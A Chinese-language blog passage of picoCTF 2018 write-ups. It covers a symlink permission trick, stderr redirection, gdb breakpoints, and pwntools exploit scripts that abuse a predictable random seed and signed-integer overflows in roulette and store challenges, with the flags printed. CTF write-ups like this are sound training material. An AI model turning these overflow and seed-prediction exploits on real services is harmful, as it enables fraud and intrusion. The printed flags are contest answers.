<p>我们首先进入家目录, 把源程序拷贝过来, 创建<code>permission.txt</code>并写入<code>yes</code>, 运行<code>./absolutely-relative</code>,<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">You have the write permissions.</span><br></pre></td></tr></table></figure></p>
<p>发现过了permission的判断, 但是并没有打印出flag, 我们看下权限<code>ls -al</code><br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">-rwxr-xr-x    1 mads mads   8984 Sep 28 07:42 absolutely-relative</span><br></pre></td></tr></table></figure></p>
<p>发现<code>cp</code>过来之后ownership变成了自己, 当然是读不了<code>flag</code>. 由于这里权限不足, 就算<code>cp -p</code>也是不行的. 但是可以用软链接的形式将源程序链接到家目录, <code>ln -s /problems/absolutely-relative_4_bef88c36784b44d2585bb4d2dbe074bd/absolutely-relative ~/</code>,再运行就可以得到flag了<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">mads@pico-2018-shell-2:~$ ./absolutely-relative </span><br><span class="line">You have the write permissions.</span><br><span class="line">picoCTF&#123;3v3r1ng_1<span class="variable">$_r3l3t1v3_3b69633f</span>&#125;</span><br></pre></td></tr></table></figure></p>
<h1 id="in-out-error-275pts"><a href="#in-out-error-275pts" class="headerlink" title="in out error (275pts)"></a>in out error (275pts)</h1><h2 id="题目-15"><a href="#题目-15" class="headerlink" title="题目"></a>题目</h2><p>Can you utlize stdin, stdout, and stderr to get the flag from this <a href="https://2018shell2.picoctf.com/static/2ecf92ada9cb40149cb4a2154441f678/in-out-error" target="_blank" rel="noopener">program [1]</a> ? You can also find it in /problems/in-out-error_3_9eb10797d687f70cfce62e7c9c2bdea6 on the shell server</p>
<blockquote>
<p>Hints:<br>(1) Maybe you can split the stdout and stderr output?</p>
</blockquote>
<h2 id="题解-15"><a href="#题解-15" class="headerlink" title="题解"></a>题解</h2><p>本题考查linux的标准输出、标准错误流, 我们可以利用<code>&gt;</code>将两种流重定向到其他地方, 从而分离流的内容, 得到flag.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">echo</span> <span class="string">'Please may I have the flag?'</span>|./<span class="keyword">in</span>-out-error 1&gt;/dev/null</span><br></pre></td></tr></table></figure></p>
<p>发现打印出很多一样的flag</p>
<h1 id="learn-gdb-300pts"><a href="#learn-gdb-300pts" class="headerlink" title="learn gdb (300pts)"></a>learn gdb (300pts)</h1><h2 id="题目-16"><a href="#题目-16" class="headerlink" title="题目"></a>题目</h2><p>Using a debugging tool will be extremely useful on your missions. Can you run this <a href="https://2018shell2.picoctf.com/static/58c2e42eecc19e464af2c0dac8da7a77/run" target="_blank" rel="noopener">program [1]</a>  in gdb and find the flag? You can find the file in /problems/learn-gdb_0_716957192e537ac769f0975c74b34194 on the shell server.</p>
<blockquote>
<p>Hints:<br>(1) Try setting breakpoints in gdb (2) Try and find a point in the program after the flag has been read into memory to break on (3) Where is the flag being written in memory?</p>
</blockquote>
<h2 id="题解-16"><a href="#题解-16" class="headerlink" title="题解"></a>题解</h2><p>主要考察gdb的基本使用. 我们先用gdb打开程序, <code>disassemble main</code>查看<code>main</code>函数的汇编代码<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># gdb -q run</span></span><br><span class="line">gef➤  disassemble main</span><br><span class="line">Dump of assembler code <span class="keyword">for</span> <span class="keyword">function</span> main:</span><br><span class="line">   0x00000000004008c9 &lt;+0&gt;:	push   rbp</span><br><span class="line">   0x00000000004008ca &lt;+1&gt;:	mov    rbp,rsp</span><br><span class="line">   0x00000000004008cd &lt;+4&gt;:	sub    rsp,0x10</span><br><span class="line">   0x00000000004008d1 &lt;+8&gt;:	mov    DWORD PTR [rbp-0x4],edi</span><br><span class="line">   0x00000000004008d4 &lt;+11&gt;:	mov    QWORD PTR [rbp-0x10],rsi</span><br><span class="line">   0x00000000004008d8 &lt;+15&gt;:	mov    rax,QWORD PTR [rip+0x200af9]        <span class="comment"># 0x6013d8 &lt;stdout@@GLIBC_2.2.5&gt;</span></span><br><span class="line">   0x00000000004008df &lt;+22&gt;:	mov    ecx,0x0</span><br><span class="line">   0x00000000004008e4 &lt;+27&gt;:	mov    edx,0x2</span><br><span class="line">   0x00000000004008e9 &lt;+32&gt;:	mov    esi,0x0</span><br><span class="line">   0x00000000004008ee &lt;+37&gt;:	mov    rdi,rax</span><br><span class="line">   0x00000000004008f1 &lt;+40&gt;:	call   0x400650 &lt;setvbuf@plt&gt;</span><br><span class="line">   0x00000000004008f6 &lt;+45&gt;:	mov    edi,0x4009d0</span><br><span class="line">   0x00000000004008fb &lt;+50&gt;:	call   0x400600 &lt;puts@plt&gt;</span><br><span class="line">   0x0000000000400900 &lt;+55&gt;:	mov    eax,0x0</span><br><span class="line">   0x0000000000400905 &lt;+60&gt;:	call   0x400786 &lt;decrypt_flag&gt;</span><br><span class="line">   0x000000000040090a &lt;+65&gt;:	mov    edi,0x400a08</span><br><span class="line">   0x000000000040090f &lt;+70&gt;:	call   0x400600 &lt;puts@plt&gt;</span><br><span class="line">   0x0000000000400914 &lt;+75&gt;:	mov    eax,0x0</span><br><span class="line">   0x0000000000400919 &lt;+80&gt;:	leave  </span><br><span class="line">   0x000000000040091a &lt;+81&gt;:	ret    </span><br><span class="line">End of assembler dump.</span><br></pre></td></tr></table></figure></p>
<p>容易发现解密flag的函数是在<code>0x0000000000400905</code>, 我们可以在下一条指令下一个断点<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  b *0x000000000040090a</span><br><span class="line">Breakpoint 1 at 0x40090a</span><br></pre></td></tr></table></figure></p>
<p>跑起来, 在断点出断下来之后, 根据题目打印信息提示获取<code>flag_buf</code>全局变量的值即可.<br><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">gef➤  x (char *)flag_buf</span><br><span class="line">0x602260:	<span class="string">"picoCTF&#123;gDb_iS_sUp3r_u53fuL_a6c61d82&#125;"</span></span><br></pre></td></tr></table></figure></p>
<h1 id="roulette-350pts"><a href="#roulette-350pts" class="headerlink" title="roulette (350pts)"></a>roulette (350pts)</h1><h2 id="题目-17"><a href="#题目-17" class="headerlink" title="题目"></a>题目</h2><p>This Online <a href="https://2018shell2.picoctf.com/static/191a3b6cb7dd34093f5d660ffa07b570/roulette" target="_blank" rel="noopener">Roulette [1]</a>  Service is in Beta. Can you find a way to win $1,000,000,000 and get the flag? <a href="https://2018shell2.picoctf.com/static/191a3b6cb7dd34093f5d660ffa07b570/roulette.c" target="_blank" rel="noopener">Source [2]</a> . Connect with nc <code>2018shell2.picoctf.com 25443</code></p>
<blockquote>
<p>Hints:<br>(1) There are 2 bugs!</p>
</blockquote>
<h2 id="题解-17"><a href="#题解-17" class="headerlink" title="题解"></a>题解</h2><p>题目是一个模拟赌场小程序, 提示有两个bug, 经过审计源代码可以发现两个bug分别是:</p>
<ol>
<li>伪随机问题<br>在<code>main</code>函数发现我们的初始<code>cash</code>是通过<code>get_rand</code>函数获得的, 看一下<code>get_rand</code><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">long</span> <span class="title">get_rand</span><span class="params">()</span> </span>&#123;</span><br><span class="line">  <span class="keyword">long</span> seed;</span><br><span class="line">  FILE *f = fopen(<span class="string">"/dev/urandom"</span>, <span class="string">"r"</span>);</span><br><span class="line">  fread(&amp;seed, <span class="keyword">sizeof</span>(seed), <span class="number">1</span>, f);</span><br><span class="line">  fclose(f);</span><br><span class="line">  seed = seed % <span class="number">5000</span>;</span><br><span class="line">  <span class="keyword">if</span> (seed &lt; <span class="number">0</span>) seed = seed * <span class="number">-1</span>;</span><br><span class="line">  srand(seed); <span class="comment">// bug1</span></span><br><span class="line">  <span class="keyword">return</span> seed;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
</li>
</ol>
<p>发现在获取到一个随机数之后, 直接作为随机数种子, 并且返回. 也就是说我们得到的初始<code>cash</code>就是伪随机发生器的种子, 这意味着我们可以知道每次要猜的值是多少.这里也给出随机数生成代码:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line"><span class="number">2.</span> 逻辑漏洞+长整型溢出</span><br><span class="line">程序中的`get_long`函数用户获取用户输入的一个`<span class="keyword">long</span>`数字, 并且判断有没有溢出, 看下源码:</span><br><span class="line">```c</span><br><span class="line"><span class="function"><span class="keyword">long</span> <span class="title">get_long</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">"&gt; "</span>);</span><br><span class="line">    <span class="keyword">uint64_t</span> l = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">char</span> c = <span class="number">0</span>;</span><br><span class="line">    <span class="keyword">while</span>(!is_digit(c))</span><br><span class="line">      c = getchar();</span><br><span class="line">    <span class="keyword">while</span>(is_digit(c)) &#123;</span><br><span class="line">        <span class="comment">// bug2</span></span><br><span class="line">      <span class="keyword">if</span>(l &gt;= LONG_MAX) &#123;</span><br><span class="line">	l = LONG_MAX;</span><br><span class="line">	<span class="keyword">break</span>;</span><br><span class="line">      &#125;</span><br><span class="line">      l *= <span class="number">10</span>;</span><br><span class="line">      l += c - <span class="string">'0'</span>;</span><br><span class="line">      c = getchar();</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">while</span>(c != <span class="string">'\n'</span>)</span><br><span class="line">      c = getchar();</span><br><span class="line">    <span class="keyword">return</span> l;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></p>
<p>乍一看好像没问题, 我们貌似没法溢出. 但仔细手模一下会发现, 判断溢出的代码写在<code>while</code>语句开头的地方, 也就是说, 我们输入的数字s, 只要s[:-1]转换成long没有溢出, 但是整个串还是可以溢出！因为溢出我们输入的是回车字符, 就可以直接跳出循环.</p>
<p>根据程序思路, 有两个要求要满足, 要<code>cash &gt; ONE_BILLION</code> 和 <code>wins &gt; HOTSRWAK(3)</code>才能拿到flag.<br>于是整体思路整理如下:</p>
<ol>
<li>利用伪随机赢下三次</li>
<li>利用长整型溢出漏洞拿到flag</li>
</ol>
<p>exp如下:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> re,subprocess</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">sh = remote(<span class="string">'2018shell2.picoctf.com'</span>, <span class="number">25443</span>)</span><br><span class="line">m1 = sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">balance = re.findall(<span class="string">'\$(\d&#123;1,4&#125;)'</span>, m1)[<span class="number">0</span>]</span><br><span class="line">rand = subprocess.check_output([<span class="string">'./rand'</span>, balance]).split(<span class="string">'\n'</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'round 1...'</span></span><br><span class="line">sh.sendline(<span class="string">'1'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">sh.sendline(rand[<span class="number">0</span>])</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'round 2...'</span></span><br><span class="line">sh.sendline(<span class="string">'1'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">sh.sendline(rand[<span class="number">2</span>])</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'round 3...'</span></span><br><span class="line">sh.sendline(<span class="string">'1'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">sh.sendline(rand[<span class="number">4</span>])</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'getting flag...'</span></span><br><span class="line">sh.sendline(<span class="string">'3294967296'</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">sh.sendline(str(int(rand[<span class="number">6</span>])+<span class="number">1</span>))</span><br><span class="line">sh.recvuntil(<span class="string">'flag!\n'</span>)</span><br><span class="line"><span class="keyword">print</span> sh.recv()</span><br><span class="line"><span class="comment"># picoCTF&#123;1_h0p3_y0u_f0uNd_b0tH_bUg5_8b7aef91&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="Store-400pts"><a href="#Store-400pts" class="headerlink" title="Store (400pts)"></a>Store (400pts)</h1><h2 id="题目-18"><a href="#题目-18" class="headerlink" title="题目"></a>题目</h2><p>We started a little <a href="https://2018shell2.picoctf.com/static/5f775969757dd025afe50827eb9db223/store" target="_blank" rel="noopener">store [1]</a> , can you buy the flag? <a href="https://2018shell2.picoctf.com/static/5f775969757dd025afe50827eb9db223/source.c" target="_blank" rel="noopener">Source [2]</a> . Connect with 2018shell2.picoctf.com 53220.</p>
<blockquote>
<p>Hints:<br>(1) Two’s compliment can do some weird things when numbers get really big!</p>
</blockquote>
<h2 id="题解-18"><a href="#题解-18" class="headerlink" title="题解"></a>题解</h2><p>题目提示补码, 顺着题意, 题目大概就是一个模拟商店, 卖两种商品, 一个是仿制的flag, 一个1000. 一个是真flag, 需要100000. 初始金钱只有1100. 程序中有加减乘除的地方就是买假flag的地方:<br><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>(auction_choice == <span class="number">1</span>)&#123;</span><br><span class="line">                <span class="built_in">printf</span>(<span class="string">"Imitation Flags cost 1000 each, how many would you like?\n"</span>);</span><br><span class="line">                </span><br><span class="line">                <span class="keyword">int</span> number_flags = <span class="number">0</span>;</span><br><span class="line">                fflush(<span class="built_in">stdin</span>);</span><br><span class="line">                <span class="built_in">scanf</span>(<span class="string">"%d"</span>, &amp;number_flags);</span><br><span class="line">                <span class="keyword">if</span>(number_flags &gt; <span class="number">0</span>)&#123;</span><br><span class="line">                    <span class="keyword">int</span> total_cost = <span class="number">0</span>;</span><br><span class="line">                    total_cost = <span class="number">1000</span>*number_flags; <span class="comment">// 这里</span></span><br><span class="line">                    <span class="built_in">printf</span>(<span class="string">"\nYour total cost is: %d\n"</span>, total_cost);</span><br><span class="line">                    <span class="keyword">if</span>(total_cost &lt;= account_balance)&#123;</span><br><span class="line">                        account_balance = account_balance - total_cost;</span><br><span class="line">                        <span class="built_in">printf</span>(<span class="string">"\nYour new balance: %d\n\n"</span>, account_balance);</span><br><span class="line">                    &#125;</span><br><span class="line">                    <span class="keyword">else</span>&#123;</span><br><span class="line">                        <span class="built_in">printf</span>(<span class="string">"Not enough funds\n"</span>);</span><br><span class="line">                    &#125;</span><br><span class="line">                &#125;</span><br><span class="line">            &#125;</span><br></pre></td></tr></table></figure></p>
<p>程序中变量都是<code>int</code>型, 也就是有符号整数型, 在购买假flag时, <code>number_flags</code>变量乘上了1000, 这里就可能存在结果超越了有符号整数型的最大正数<code>2147483647</code>, 从而变成一个负数, 然后后面的语句<code>account_balance = account_balance - total_cost;</code>就会导致<code>account_balance</code>在购买了假flag之后反而变多了. 根据题意需要<code>100000</code>购买真flag, 我们做一下数学题.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">account_balance - (input * 1000 - 2^32) &gt; 100000</span><br></pre></td></tr></table></figure></p>
<p>我们算出一个值, <code>4294868</code>输入给<code>number_flags</code>即可获得flag. exp如下<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">context.log_level = <span class="string">"error"</span></span><br><span class="line">sh = remote(<span class="string">"2018shell2.picoctf.com"</span>,<span class="number">53220</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'2'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'1'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'4294868'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'2'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'2'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">sh.sendline(<span class="string">'1'</span>)</span><br><span class="line">sh.recv()</span><br><span class="line">msg = sh.recv()</span><br><span class="line">flag = re.findall(<span class="string">"(picoCTF&#123;.*&#125;)"</span>, msg)[<span class="number">0</span>]</span><br><span class="line"><span class="keyword">print</span> flag <span class="comment"># picoCTF&#123;numb3r3_4r3nt_s4f3_cbb7151f&#125;</span></span><br></pre></td></tr></table></figure></p>
<h1 id="script-me-500pts"><a href="#script-me-500pts" class="headerlink" title="script me (500pts)"></a>script me (500pts)</h1><h2 id="题目-19"><a href="#题目-19" class="headerlink" title="题目"></a>题目</h2><p>Can you understand the language and answer the questions to retrieve the flag? Connect to the service with nc 2018shell2.picoctf.com 8672</p>
<blockquote>
<p>Hints:<br>(1) Maybe try writing a python script?</p>
</blockquote>
<h2 id="题解-19"><a href="#题解-19" class="headerlink" title="题解"></a>题解</h2><p>这道题很有意思, 根据给出的一些计算规则, 计算复杂的组合式.<br><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">() + () = ()()                                      =&gt; [combine]</span><br><span class="line">((())) + () = ((())())                              =&gt; [absorb-right]</span><br><span class="line">() + ((())) = (()(()))                              =&gt; [absorb-left]</span><br><span class="line">(())(()) + () = (())(()())                          =&gt; [combined-absorb-right]</span><br><span class="line">() + (())(()) = (()())(())                          =&gt; [combined-absorb-left]</span><br><span class="line">(())(()) + ((())) = ((())(())(()))                  =&gt; [absorb-combined-right]</span><br><span class="line">((())) + (())(()) = ((())(())(()))                  =&gt; [absorb-combined-left]</span><br><span class="line">() + (()) + ((())) = (()()) + ((())) = ((()())(())) =&gt; [left-associative]</span><br></pre></td></tr></table></figure></p>
<p>仔细观察题目可以发现, 这些计算规则无非就是结合与左右吸收, 结合就是简单连接, 左右吸收都是简单的吸收到第一个半括号内. 我们需要寻找的就是什么时候做这些操作. 也就是说, 他是根据什么来判断是该结合还是该左吸收还是右吸收. 我这里发现一个规律(当然可能并不是唯一解): 判断的原则是表达式中的括号的最大深度. 比如<code>()</code>深度是1, <code>(())</code>深度是2, <code>(())(())</code>深度也是2. 于是拿到一个简单的二元表达式, 计算思路是:</p>
<ol>
<li>计算两个元素s1, s2的最大深度w1, w2.</li>
<li>如果w1==w2相等, 则直接<code>combine</code>, return s1+s2; </li>
<li>如果w1&gt;w2, 则 return s1[:-1] + s2 + s1[-1];</li>
<li>如果w1&lt;w2, 则 return s1[1] + s2 + s1[1:];</li>
</ol>
<p>于是拿到一串要计算的表达式, 整体思路就是:</p>
<ol>
<li>获取各个表达式元素</li>
<li>根据<code>left-associative</code>原则, 从左往右两两计算</li>
</ol>
<p>exp如下:<br><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding:utf-8</span></span><br><span class="line"><span class="keyword">import</span> sys,re</span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">get_weight</span><span class="params">(s)</span>:</span></span><br><span class="line">    w = <span class="number">1</span></span><br><span class="line">    wm = <span class="number">1</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> s[<span class="number">1</span>:]:</span><br><span class="line">        <span class="keyword">if</span> i == <span class="string">'('</span>:</span><br><span class="line">            w+=<span class="number">1</span></span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            w-=<span class="number">1</span></span><br><span class="line">        <span class="keyword">if</span> w&gt;wm:</span><br><span class="line">            wm = w</span><br><span class="line">    <span class="keyword">return</span> wm</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span><span class="params">(e1,e2)</span>:</span></span><br><span class="line">    w1 = get_weight(e1)</span><br><span class="line">    w2 = get_weight(e2)</span><br><span class="line">    <span class="keyword">if</span> w1 == w2:</span><br><span class="line">        <span class="keyword">return</span> e1+e2</span><br><span class="line">    <span class="keyword">elif</span> w1&gt;w2:</span><br><span class="line">        <span class="keyword">return</span> e1[:<span class="number">-1</span>] + e2 + e1[<span class="number">-1</span>]</span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        <span class="keyword">return</span> e2[<span class="number">0</span>] + e1 + e2[<span class="number">1</span>:]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">calc</span><span class="params">(ea)</span>:</span></span><br><span class="line">    r = ea[<span class="number">0</span>]</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1</span>, len(ea)):</span><br><span class="line">        r = add(r, ea[i])</span><br><span class="line">    <span class="keyword">return</span> r</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> <span class="string">'connecting...'</span></span><br><span class="line">sh = remote(<span class="string">'2018shell2.picoctf.com'</span>, <span class="number">8672</span>)</span><br><span class="line">sh.recvuntil(<span class="string">'.\n'</span>)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'round 1...'</span></span><br><span class="line">e = sh.recvline().split(<span class="string">' = '</span>)[<span class="number">0</span>]</span><br><span class="line">a = calc(e.split(<span class="string">' + '</span>))</span><br><span class="line">sh.recvuntil(<span class="string">'&gt; '</span>)</span><br><span class="line">sh.sendline(a)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">4</span>):</span><br><span class="line">    <span class="keyword">print</span> <span class="string">'round '</span>+ str(i+<span class="number">2</span>) +<span class="string">'...'</span></span><br><span class="line">    e = re.findall(<span class="string">'(\([() +]+\))'</span>, sh.recvuntil(<span class="string">'&gt; '</span>))[<span class="number">0</span>]</span><br><span class="line">    a = calc(e.split(<span class="string">' + '</span>))</span><br><span class="line">    sh.sendline(a)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'receiving flag...'</span></span><br><span class="line">sh.recvuntil(<span class="string">'flag'</span>)</span><br><span class="line">flag = re.findall(<span class="string">'(picoCTF&#123;.*&#125;)'</span>, sh.recv())[<span class="number">0</span>]</span><br><span class="line"><span class="keyword">print</span> flag <span class="comment"># picoCTF&#123;5cr1pt1nG_l1k3_4_pRo_0970eb2d&#125;</span></span><br></pre></td></tr></table></figure></p>

           
        </section>
    </article>
    
    <div class="comment">
        <div id="gitalk-container"></div>
    </div>
    
  </div>
  <aside>
    
    <div class="toc-container">
        <h1>目录</h1>
        <div class="content">
            <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#General-Warmup-1-150pts"><span class="toc-number">1.</span> <span class="toc-text">General Warmup 1 (150pts)</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#题目"><span class="toc-number">2.</span> <span class="toc-text">题目</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题解"><span class="toc-number">2.1.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#General-Warmup-2-50pts"><span class="toc-number">3.</span> <span class="toc-text">General Warmup 2 (50pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-1"><span class="toc-number">3.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-1"><span class="toc-number">3.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#General-Warmup-3-50pts"><span class="toc-number">4.</span> <span class="toc-text">General Warmup 3 (50pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-2"><span class="toc-number">4.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-2"><span class="toc-number">4.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Resources-50pts"><span class="toc-number">5.</span> <span class="toc-text">Resources (50pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-3"><span class="toc-number">5.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-3"><span class="toc-number">5.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#grep-1-75pts"><span class="toc-number">6.</span> <span class="toc-text">grep 1 (75pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-4"><span class="toc-number">6.1.</span> <span class="toc-text">题目</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#题解-4"><span class="toc-number">6.2.</span> <span class="toc-text">题解</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#net-cat-75pts"><span class="toc-number">7.</span> <span class="toc-text">net cat (75pts)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#题目-5"><span class="toc-number">7.1.</span> <span 